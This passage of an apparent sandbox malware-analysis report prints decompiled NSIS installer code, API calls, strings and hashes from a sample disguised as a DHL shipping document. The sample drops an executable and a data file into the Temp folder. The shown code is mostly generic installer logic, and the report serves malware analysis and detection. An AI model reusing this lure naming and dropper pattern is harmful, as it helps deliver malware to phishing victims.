                        • Associated: 00000000.00000002.266038010.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266059378.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266123296.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL AWB SHIPPING DOCS_AWB_0009123.jbxd
                        Similarity
                        • API ID: Window$Item$MessageSendShow$Enable$LongMenu$CallbackDestroyDispatcherEnabledSystemTextUserlstrlen
                        • String ID: H7B
                        • API String ID: 2475350683-2300413410
                        • Opcode ID: b499a380baa1669b9d39d87f51061d2fd0c3acf201e93ffa24678bb3f42416dd
                        • Instruction ID: 1d4a55fced449df2e2a9dfc159c1061f424388fbea236c5341ec002980a30b6c
                        • Opcode Fuzzy Hash: b499a380baa1669b9d39d87f51061d2fd0c3acf201e93ffa24678bb3f42416dd
                        • Instruction Fuzzy Hash: C0C1C2B1600604FBDB216F61EE85E2A3B78EB85745F40097EF781B51F0CB3958529B2E
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        [Control-flow graph of function 00403D17; node legend: Executed / Not Executed]
                        C-Code - Quality: 96%
                        			E00403D17(void* __eflags) {
                        				intOrPtr _v4;
                        				intOrPtr _v8;
                        				int _v12;
                        				void _v16;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				intOrPtr* _t22;
                        				void* _t30;
                        				void* _t32;
                        				int _t33;
                        				void* _t36;
                        				int _t39;
                        				int _t40;
                        				int _t44;
                        				short _t63;
                        				WCHAR* _t65;
                        				signed char _t69;
                        				WCHAR* _t76;
                        				intOrPtr _t82;
                        				WCHAR* _t87;
                        
                        				_t82 =  *0x42a270;
                        				_t22 = E00406A35(2);
                        				_t90 = _t22;
                        				if(_t22 == 0) {
                        					_t76 = 0x423748;
                        					L"1033" = 0x30;
                        					 *0x437002 = 0x78;
                        					 *0x437004 = 0;
                        					E00406536(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x423748, 0);
                        					__eflags =  *0x423748;
                        					if(__eflags == 0) {
                        						E00406536(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x423748, 0);
                        					}
                        					lstrcatW(L"1033", _t76);
                        				} else {
                        					E004065AF(L"1033",  *_t22() & 0x0000ffff);
                        				}
                        				E00403FED(_t78, _t90);
                        				_t86 = L"C:\\Users\\hardz\\AppData\\Local\\Temp";
                        				 *0x42a2e0 =  *0x42a278 & 0x00000020;
                        				 *0x42a2fc = 0x10000;
                        				if(E0040603F(_t90, L"C:\\Users\\hardz\\AppData\\Local\\Temp") != 0) {
                        					L16:
                        					if(E0040603F(_t98, _t86) == 0) {
                        						E004066A5(_t76, 0, _t82, _t86,  *((intOrPtr*)(_t82 + 0x118)));
                        					}
                        					_t30 = LoadImageW( *0x42a260, 0x67, 1, 0, 0, 0x8040); // executed
                        					 *0x429248 = _t30;
                        					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
                        						L21:
                        						if(E0040140B(0) == 0) {
                        							_t32 = E00403FED(_t78, __eflags);
                        							__eflags =  *0x42a300;
                        							if( *0x42a300 != 0) {
                        								_t33 = E0040579D(_t32, 0);
                        								__eflags = _t33;
                        								if(_t33 == 0) {
                        									E0040140B(1);
                        									goto L33;
                        								}
                        								__eflags =  *0x42922c;
                        								if( *0x42922c == 0) {
                        									E0040140B(2);
                        								}
                        								goto L22;
                        							}
                        							ShowWindow( *0x423728, 5); // executed
                        							_t39 = E004069C5("RichEd20"); // executed
                        							__eflags = _t39;
                        							if(_t39 == 0) {
                        								E004069C5("RichEd32");
                        							}
                        							_t87 = L"RichEdit20W";
                        							_t40 = GetClassInfoW(0, _t87, 0x429200);
                        							__eflags = _t40;
                        							if(_t40 == 0) {
                        								GetClassInfoW(0, L"RichEdit", 0x429200);
                        								 *0x429224 = _t87;
                        								RegisterClassW(0x429200);
                        							}
                        							_t44 = DialogBoxParamW( *0x42a260,  *0x429240 + 0x00000069 & 0x0000ffff, 0, E004040C5, 0); // executed
                        							E00403C67(E0040140B(5), 1);
                        							return _t44;
                        						}
                        						L22:
                        						_t36 = 2;
                        						return _t36;
                        					} else {
                        						_t78 =  *0x42a260;
                        						 *0x429204 = E00401000;
                        						 *0x429210 =  *0x42a260;
                        						 *0x429214 = _t30;
                        						 *0x429224 = 0x40a3b4;
                        						if(RegisterClassW(0x429200) == 0) {
                        							L33:
                        							__eflags = 0;
                        							return 0;
                        						}
                        						SystemParametersInfoW(0x30, 0,  &_v16, 0);
                        						 *0x423728 = CreateWindowExW(0x80, 0x40a3b4, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42a260, 0);
                        						goto L21;
                        					}
                        				} else {
                        					_t78 =  *(_t82 + 0x48);
                        					_t92 = _t78;
                        					if(_t78 == 0) {
                        						goto L16;
                        					}
                        					_t76 = 0x428200;
                        					E00406536(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x42a298 + _t78 * 2,  *0x42a298 +  *(_t82 + 0x4c) * 2, 0x428200, 0);
                        					_t63 =  *0x428200; // 0x22
                        					if(_t63 == 0) {
                        						goto L16;
                        					}
                        					if(_t63 == 0x22) {
                        						_t76 = 0x428202;
                        						 *((short*)(E00405F64(0x428202, 0x22))) = 0;
                        					}
                        					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
                        					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
                        						L15:
                        						E00406668(_t86, E00405F37(_t76));
                        						goto L16;
                        					} else {
                        						_t69 = GetFileAttributesW(_t76);
                        						if(_t69 == 0xffffffff) {
                        							L14:
                        							E00405F83(_t76);
                        							goto L15;
                        						}
                        						_t98 = _t69 & 0x00000010;
                        						if((_t69 & 0x00000010) != 0) {
                        							goto L15;
                        						}
                        						goto L14;
                        					}
                        				}
                        			}

                        APIs
                          • Part of subcall function 00406A35: GetModuleHandleA.KERNEL32(?,00000020,?,00403750,0000000B), ref: 00406A47
                          • Part of subcall function 00406A35: GetProcAddress.KERNEL32(00000000,?), ref: 00406A62
                        • lstrcatW.KERNEL32(1033,00423748), ref: 00403D98
                        • lstrlenW.KERNEL32("C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exe" C:\Users\user\AppData\Local\Temp\rjnyysvx.m,?,?,?,"C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exe" C:\Users\user\AppData\Local\Temp\rjnyysvx.m,00000000,C:\Users\user\AppData\Local\Temp,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000,00000002,74D0FAA0), ref: 00403E18
                        • lstrcmpiW.KERNEL32(?,.exe,"C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exe" C:\Users\user\AppData\Local\Temp\rjnyysvx.m,?,?,?,"C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exe" C:\Users\user\AppData\Local\Temp\rjnyysvx.m,00000000,C:\Users\user\AppData\Local\Temp,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000), ref: 00403E2B
                        • GetFileAttributesW.KERNEL32("C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exe" C:\Users\user\AppData\Local\Temp\rjnyysvx.m,?,00000000,?), ref: 00403E36
                        • LoadImageW.USER32 ref: 00403E7F
                          • Part of subcall function 004065AF: wsprintfW.USER32 ref: 004065BC
                        • RegisterClassW.USER32 ref: 00403EBC
                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403ED4
                        • CreateWindowExW.USER32 ref: 00403F09
                        • ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403F3F
                        • GetClassInfoW.USER32 ref: 00403F6B
                        • GetClassInfoW.USER32 ref: 00403F78
                        • RegisterClassW.USER32 ref: 00403F81
                        • DialogBoxParamW.USER32 ref: 00403FA0
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.266044855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.266038010.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266059378.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266123296.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL AWB SHIPPING DOCS_AWB_0009123.jbxd
                        Similarity
                        • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                        • String ID: "C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exe" C:\Users\user\AppData\Local\Temp\rjnyysvx.m$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$H7B$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                        • API String ID: 1975747703-185731113
                        • Opcode ID: 53155da091c4b3d7a5df89bad193350c55a8525543a5f9d2669ac1eab67f041a
                        • Instruction ID: e235badc60aeba35c86cf297cd954ec43a22164425911800af60bc979c7621a1
                        • Opcode Fuzzy Hash: 53155da091c4b3d7a5df89bad193350c55a8525543a5f9d2669ac1eab67f041a
                        • Instruction Fuzzy Hash: E661D570640201BAD730AF66AD45E2B3A7CEB84B49F40457FF945B22E1DB3D5911CA3D
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        [Control-flow graph of function 004030D0; node legend: Executed / Not Executed]
                        C-Code - Quality: 98%
                        			E004030D0(void* __eflags, signed int _a4) {
                        				DWORD* _v8;
                        				DWORD* _v12;
                        				intOrPtr _v16;
                        				long _v20;
                        				intOrPtr _v24;
                        				intOrPtr _v28;
                        				intOrPtr _v32;
                        				intOrPtr _v36;
                        				signed int _v40;
                        				short _v560;
                        				long _t54;
                        				void* _t57;
                        				void* _t62;
                        				intOrPtr _t65;
                        				void* _t68;
                        				intOrPtr* _t70;
                        				long _t82;
                        				signed int _t89;
                        				intOrPtr _t92;
                        				long _t94;
                        				void* _t102;
                        				void* _t106;
                        				long _t107;
                        				long _t110;
                        				void* _t111;
                        
                        				_t94 = 0;
                        				_v8 = 0;
                        				_v12 = 0;
                        				 *0x42a26c = GetTickCount() + 0x3e8;
                        				GetModuleFileNameW(0, L"C:\\Users\\hardz\\Desktop\\DHL AWB SHIPPING DOCS_AWB_0009123.exe", 0x400);
                        				_t106 = E00406158(L"C:\\Users\\hardz\\Desktop\\DHL AWB SHIPPING DOCS_AWB_0009123.exe", 0x80000000, 3);
                        				 *0x40a018 = _t106;
                        				if(_t106 == 0xffffffff) {
                        					return L"Error launching installer";
                        				}
                        				E00406668(L"C:\\Users\\hardz\\Desktop", L"C:\\Users\\hardz\\Desktop\\DHL AWB SHIPPING DOCS_AWB_0009123.exe");
                        				E00406668(0x439000, E00405F83(L"C:\\Users\\hardz\\Desktop"));
                        				_t54 = GetFileSize(_t106, 0);
                        				 *0x420f00 = _t54;
                        				_t110 = _t54;
                        				if(_t54 <= 0) {
                        					L24:
                        					E0040302E(1);
                        					if( *0x42a274 == _t94) {
                        						goto L32;
                        					}
                        					if(_v12 == _t94) {
                        						L28:
                        						_t57 = GlobalAlloc(0x40, _v20); // executed
                        						_t111 = _t57;
                        						E00406B90(0x40ce68);
                        						E00406187(0x40ce68,  &_v560, L"C:\\Users\\hardz\\AppData\\Local\\Temp\\"); // executed
                        						_t62 = CreateFileW( &_v560, 0xc0000000, _t94, _t94, 2, 0x4000100, _t94); // executed
                        						 *0x40a01c = _t62;
                        						if(_t62 != 0xffffffff) {
                        							_t65 = E004035F8( *0x42a274 + 0x1c);
                        							 *0x420f04 = _t65;
                        							 *0x420ef8 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
                        							_t68 = E00403371(_v16, 0xffffffff, _t94, _t111, _v20); // executed
                        							if(_t68 == _v20) {
                        								 *0x42a270 = _t111;
                        								 *0x42a278 =  *_t111;
                        								if((_v40 & 0x00000001) != 0) {
                        									 *0x42a27c =  *0x42a27c + 1;
                        								}
                        								_t45 = _t111 + 0x44; // 0x44
                        								_t70 = _t45;
                        								_t102 = 8;
                        								do {
                        									_t70 = _t70 - 8;
                        									 *_t70 =  *_t70 + _t111;
                        									_t102 = _t102 - 1;
                        								} while (_t102 != 0);
                        								 *((intOrPtr*)(_t111 + 0x3c)) =  *0x420ef4;
                        								E00406113(0x42a280, _t111 + 4, 0x40);
                        								return 0;
                        							}
                        							goto L32;
                        						}
                        						return L"Error writing temporary file. Make sure your temp folder is valid.";
                        					}
                        					E004035F8( *0x420ef0);
                        					if(E004035E2( &_a4, 4) == 0 || _v8 != _a4) {
                        						goto L32;
                        					} else {
                        						goto L28;
                        					}
                        				} else {
                        					do {
                        						_t107 = _t110;
                        						asm("sbb eax, eax");
                        						_t82 = ( ~( *0x42a274) & 0x00007e00) + 0x200;
                        						if(_t110 >= _t82) {
                        							_t107 = _t82;
                        						}
                        						if(E004035E2(0x418ef0, _t107) == 0) {
                        							E0040302E(1);
                        							L32:
                        							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
                        						}
                        						if( *0x42a274 != 0) {
                        							if((_a4 & 0x00000002) == 0) {
                        								E0040302E(0);
                        							}
                        							goto L20;
                        						}
                        						E00406113( &_v40, 0x418ef0, 0x1c);
                        						_t89 = _v40;
                        						if((_t89 & 0xfffffff0) == 0 && _v36 == 0xdeadbeef && _v24 == 0x74736e49 && _v28 == 0x74666f73 && _v32 == 0x6c6c754e) {
                        							_a4 = _a4 | _t89;
                        							 *0x42a300 =  *0x42a300 | _a4 & 0x00000002;
                        							_t92 = _v16;
                        							 *0x42a274 =  *0x420ef0;
                        							if(_t92 > _t110) {
                        								goto L32;
                        							}
                        							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
                        								_v12 = _v12 + 1;
                        								_t110 = _t92 - 4;
                        								if(_t107 > _t110) {
                        									_t107 = _t110;
                        								}
                        								goto L20;
                        							} else {
                        								break;
                        							}
                        						}
                        						L20:
                        						if(_t110 <  *0x420f00) {
                        							_v8 = E00406B22(_v8, 0x418ef0, _t107);
                        						}
                        						 *0x420ef0 =  *0x420ef0 + _t107;
                        						_t110 = _t110 - _t107;
                        					} while (_t110 != 0);
                        					_t94 = 0;
                        					goto L24;
                        				}
                        			}





























                        APIs
                        • GetTickCount.KERNEL32 ref: 004030E4
                        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\DHL AWB SHIPPING DOCS_AWB_0009123.exe,00000400), ref: 00403100
                          • Part of subcall function 00406158: GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\DHL AWB SHIPPING DOCS_AWB_0009123.exe,80000000,00000003), ref: 0040615C
                          • Part of subcall function 00406158: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                        • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\DHL AWB SHIPPING DOCS_AWB_0009123.exe,C:\Users\user\Desktop\DHL AWB SHIPPING DOCS_AWB_0009123.exe,80000000,00000003), ref: 00403149
                        • GlobalAlloc.KERNELBASE(00000040,?), ref: 0040328B
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.266044855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.266038010.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266059378.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266123296.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL AWB SHIPPING DOCS_AWB_0009123.jbxd
                        Similarity
                        • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                        • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\DHL AWB SHIPPING DOCS_AWB_0009123.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                        • API String ID: 2803837635-2416835633
                        • Opcode ID: 0724999653b3e73eed60d379075ff5ac069807c872a81a0186dc1bcbf61f2663
                        • Instruction ID: 6a7077609e6cbe8902eef3654a796be60faa9129f620d49927b75729aeb44cd1
                        • Opcode Fuzzy Hash: 0724999653b3e73eed60d379075ff5ac069807c872a81a0186dc1bcbf61f2663
                        • Instruction Fuzzy Hash: 74710271A40204ABDB20DFB5DD85B9E3AACAB04315F21457FF901B72D2CB789E418B6D
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 459 40176f-401794 call 402da6 call 405fae 464 401796-40179c call 406668 459->464 465 40179e-4017b0 call 406668 call 405f37 lstrcatW 459->465 470 4017b5-4017b6 call 4068ef 464->470 465->470 474 4017bb-4017bf 470->474 475 4017c1-4017cb call 40699e 474->475 476 4017f2-4017f5 474->476 483 4017dd-4017ef 475->483 484 4017cd-4017db CompareFileTime 475->484 477 4017f7-4017f8 call 406133 476->477 478 4017fd-401819 call 406158 476->478 477->478 486 40181b-40181e 478->486 487 40188d-4018b6 call 4056ca call 403371 478->487 483->476 484->483 488 401820-40185e call 406668 * 2 call 4066a5 call 406668 call 405cc8 486->488 489 40186f-401879 call 4056ca 486->489 499 4018b8-4018bc 487->499 500 4018be-4018ca SetFileTime 487->500 488->474 521 401864-401865 488->521 501 401882-401888 489->501 499->500 503 4018d0-4018db FindCloseChangeNotification 499->503 500->503 504 402c33 501->504 506 4018e1-4018e4 503->506 507 402c2a-402c2d 503->507 508 402c35-402c39 504->508 511 4018e6-4018f7 call 4066a5 lstrcatW 506->511 512 4018f9-4018fc call 4066a5 506->512 507->504 518 401901-4023a2 call 405cc8 511->518 512->518 518->507 518->508 521->501 523 401867-401868 521->523 523->489
                        C-Code - Quality: 77%
                        			E0040176F(FILETIME* __ebx, void* __eflags) {
                        				void* __esi;
                        				void* _t35;
                        				void* _t43;
                        				void* _t45;
                        				FILETIME* _t51;
                        				FILETIME* _t64;
                        				void* _t66;
                        				signed int _t72;
                        				FILETIME* _t73;
                        				FILETIME* _t77;
                        				signed int _t79;
                        				WCHAR* _t81;
                        				void* _t83;
                        				void* _t84;
                        				void* _t86;
                        
                        				_t77 = __ebx;
                        				 *(_t86 - 8) = E00402DA6(0x31);
                        				 *(_t86 + 8) =  *(_t86 - 0x30) & 0x00000007;
                        				_t35 = E00405FAE( *(_t86 - 8));
                        				_push( *(_t86 - 8));
                        				_t81 = L"\"C:\\";
                        				if(_t35 == 0) {
                        					lstrcatW(E00405F37(E00406668(_t81, L"C:\\Users\\hardz\\AppData\\Local\\Temp")), ??);
                        				} else {
                        					E00406668();
                        				}
                        				E004068EF(_t81);
                        				while(1) {
                        					__eflags =  *(_t86 + 8) - 3;
                        					if( *(_t86 + 8) >= 3) {
                        						_t66 = E0040699E(_t81);
                        						_t79 = 0;
                        						__eflags = _t66 - _t77;
                        						if(_t66 != _t77) {
                        							_t73 = _t66 + 0x14;
                        							__eflags = _t73;
                        							_t79 = CompareFileTime(_t73, _t86 - 0x24);
                        						}
                        						asm("sbb eax, eax");
                        						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
                        						__eflags = _t72;
                        						 *(_t86 + 8) = _t72;
                        					}
                        					__eflags =  *(_t86 + 8) - _t77;
                        					if( *(_t86 + 8) == _t77) {
                        						E00406133(_t81);
                        					}
                        					__eflags =  *(_t86 + 8) - 1;
                        					_t43 = E00406158(_t81, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
                        					__eflags = _t43 - 0xffffffff;
                        					 *(_t86 - 0x38) = _t43;
                        					if(_t43 != 0xffffffff) {
                        						break;
                        					}
                        					__eflags =  *(_t86 + 8) - _t77;
                        					if( *(_t86 + 8) != _t77) {
                        						E004056CA(0xffffffe2,  *(_t86 - 8));
                        						__eflags =  *(_t86 + 8) - 2;
                        						if(__eflags == 0) {
                        							 *((intOrPtr*)(_t86 - 4)) = 1;
                        						}
                        						L31:
                        						 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t86 - 4));
                        						__eflags =  *0x42a2e8;
                        						goto L32;
                        					} else {
                        						E00406668(0x40b5f8, _t83);
                        						E00406668(_t83, _t81);
                        						E004066A5(_t77, _t81, _t83, "C:\Users\hardz\AppData\Local\Temp",  *((intOrPtr*)(_t86 - 0x1c)));
                        						E00406668(_t83, 0x40b5f8);
                        						_t64 = E00405CC8("C:\Users\hardz\AppData\Local\Temp",  *(_t86 - 0x30) >> 3) - 4;
                        						__eflags = _t64;
                        						if(_t64 == 0) {
                        							continue;
                        						} else {
                        							__eflags = _t64 == 1;
                        							if(_t64 == 1) {
                        								 *0x42a2e8 =  &( *0x42a2e8->dwLowDateTime);
                        								L32:
                        								_t51 = 0;
                        								__eflags = 0;
                        							} else {
                        								_push(_t81);
                        								_push(0xfffffffa);
                        								E004056CA();
                        								L29:
                        								_t51 = 0x7fffffff;
                        							}
                        						}
                        					}
                        					L33:
                        					return _t51;
                        				}
                        				E004056CA(0xffffffea,  *(_t86 - 8));
                        				 *0x42a314 =  *0x42a314 + 1;
                        				_t45 = E00403371(_t79,  *((intOrPtr*)(_t86 - 0x28)),  *(_t86 - 0x38), _t77, _t77); // executed
                        				 *0x42a314 =  *0x42a314 - 1;
                        				__eflags =  *(_t86 - 0x24) - 0xffffffff;
                        				_t84 = _t45;
                        				if( *(_t86 - 0x24) != 0xffffffff) {
                        					L22:
                        					SetFileTime( *(_t86 - 0x38), _t86 - 0x24, _t77, _t86 - 0x24); // executed
                        				} else {
                        					__eflags =  *((intOrPtr*)(_t86 - 0x20)) - 0xffffffff;
                        					if( *((intOrPtr*)(_t86 - 0x20)) != 0xffffffff) {
                        						goto L22;
                        					}
                        				}
                        				FindCloseChangeNotification( *(_t86 - 0x38)); // executed
                        				__eflags = _t84 - _t77;
                        				if(_t84 >= _t77) {
                        					goto L31;
                        				} else {
                        					__eflags = _t84 - 0xfffffffe;
                        					if(_t84 != 0xfffffffe) {
                        						E004066A5(_t77, _t81, _t84, _t81, 0xffffffee);
                        					} else {
                        						E004066A5(_t77, _t81, _t84, _t81, 0xffffffe9);
                        						lstrcatW(_t81,  *(_t86 - 8));
                        					}
                        					_push(0x200010);
                        					_push(_t81);
                        					E00405CC8();
                        					goto L29;
                        				}
                        				goto L33;
                        			}



















                        APIs
                        • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
                        • CompareFileTime.KERNEL32(-00000014,?,"C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exe" C:\Users\user\AppData\Local\Temp\rjnyysvx.m,"C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exe" C:\Users\user\AppData\Local\Temp\rjnyysvx.m,00000000,00000000,"C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exe" C:\Users\user\AppData\Local\Temp\rjnyysvx.m,C:\Users\user\AppData\Local\Temp,?,?,00000031), ref: 004017D5
                          • Part of subcall function 00406668: lstrcpynW.KERNEL32(?,?,00000400,004037B0,00429260,NSIS Error), ref: 00406675
                          • Part of subcall function 004056CA: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                          • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                          • Part of subcall function 004056CA: lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
                          • Part of subcall function 004056CA: SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                          • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                          • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                          • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.266044855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.266038010.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266059378.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266123296.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL AWB SHIPPING DOCS_AWB_0009123.jbxd
                        Similarity
                        • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                        • String ID: "C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exe" C:\Users\user\AppData\Local\Temp\rjnyysvx.m$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp
                        • API String ID: 1941528284-1764132218
                        • Opcode ID: 453958bc0cd1b2dd253e880fcd992b37c005c95db4a67daf6dea3c0e9c97f409
                        • Instruction ID: 87dd38174d63fc88252c3cacf76d35d2aef1a13c6195c1d88e2760da23471212
                        • Opcode Fuzzy Hash: 453958bc0cd1b2dd253e880fcd992b37c005c95db4a67daf6dea3c0e9c97f409
                        • Instruction Fuzzy Hash: DE41B771500205BACF10BBB5CD85DAE7A75EF45328B20473FF422B21E1D63D89619A2E
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 525 4069c5-4069e5 GetSystemDirectoryW 526 4069e7 525->526 527 4069e9-4069eb 525->527 526->527 528 4069fc-4069fe 527->528 529 4069ed-4069f6 527->529 531 4069ff-406a32 wsprintfW LoadLibraryExW 528->531 529->528 530 4069f8-4069fa 529->530 530->531
                        C-Code - Quality: 100%
                        			E004069C5(intOrPtr _a4) {
                        				short _v576;
                        				signed int _t13;
                        				struct HINSTANCE__* _t17;
                        				signed int _t19;
                        				void* _t24;
                        
                        				_t13 = GetSystemDirectoryW( &_v576, 0x104);
                        				if(_t13 > 0x104) {
                        					_t13 = 0;
                        				}
                        				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
                        					_t19 = 1;
                        				} else {
                        					_t19 = 0;
                        				}
                        				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
                        				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
                        				return _t17;
                        			}









                        APIs
                        • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069DC
                        • wsprintfW.USER32 ref: 00406A17
                        • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A2B
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.266044855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.266038010.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266059378.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.000000000040C000.00000004.00000001.01000000.00000003.sdmp
